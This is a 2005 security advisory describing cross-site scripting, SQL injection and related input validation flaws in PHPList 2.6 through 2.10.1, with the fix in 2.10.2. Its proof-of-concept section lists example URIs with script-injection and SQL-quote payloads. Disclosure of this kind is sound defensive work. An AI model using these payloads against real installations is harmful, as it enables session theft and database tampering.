PHPList Multiple Input Validation Vulnerabilities
BID:15350
Info
PHPList Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 15350 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 07 2005 12:00AM |
| Updated: | Nov 07 2005 12:00AM |
| Credit: | Tobias Klein <[email protected]> is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
PHPList Mailing List Manager 2.10.1 PHPList Mailing List Manager 2.8.12 PHPList Mailing List Manager 2.6.4 PHPList Mailing List Manager 2.6.3 PHPList Mailing List Manager 2.6.2 PHPList Mailing List Manager 2.6.1 PHPList Mailing List Manager 2.6 |
| Not Vulnerable: |
PHPList Mailing List Manager 2.10.2 |
Discussion
PHPList Multiple Input Validation Vulnerabilities
PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input.
The application is prone to multiple cross-site scripting, HTTP injection, SQL injection and directory traversal vulnerabilities.
PHPList is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input.
The application is prone to multiple cross-site scripting, HTTP injection, SQL injection and directory traversal vulnerabilities.
Exploit / POC
PHPList Multiple Input Validation Vulnerabilities
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/lists/admin/?page=admin&id=1'[SQL]
http://www.example.com/lists/admin/?page=editattributes&id=1'[SQL]
http://www.example.com/lists/admin/?page=eventlog&s=0&filter="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=eventlog&start=&delete="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=eventlog&start="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=configure&id="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=users&find="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=admin&start="><script>alert(document.cookie)</script>
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/lists/admin/?page=admin&id=1'[SQL]
http://www.example.com/lists/admin/?page=editattributes&id=1'[SQL]
http://www.example.com/lists/admin/?page=eventlog&s=0&filter="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=eventlog&start=&delete="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=eventlog&start="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=configure&id="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=users&find="><script>alert(document.cookie)</script>
http://www.example.com/lists/admin/?page=admin&start="><script>alert(document.cookie)</script>
Solution / Fix
PHPList Multiple Input Validation Vulnerabilities
Solution:
The vendor has addressed these issues in PHPList 2.10.2 and later:
PHPList Mailing List Manager 2.10.1
PHPList Mailing List Manager 2.6
PHPList Mailing List Manager 2.6.1
PHPList Mailing List Manager 2.6.2
PHPList Mailing List Manager 2.6.3
PHPList Mailing List Manager 2.6.4
PHPList Mailing List Manager 2.8.12
Solution:
The vendor has addressed these issues in PHPList 2.10.2 and later:
PHPList Mailing List Manager 2.10.1
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6.1
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6.2
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6.3
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6.4
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.8.12
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
References
PHPList Multiple Input Validation Vulnerabilities
References:
References: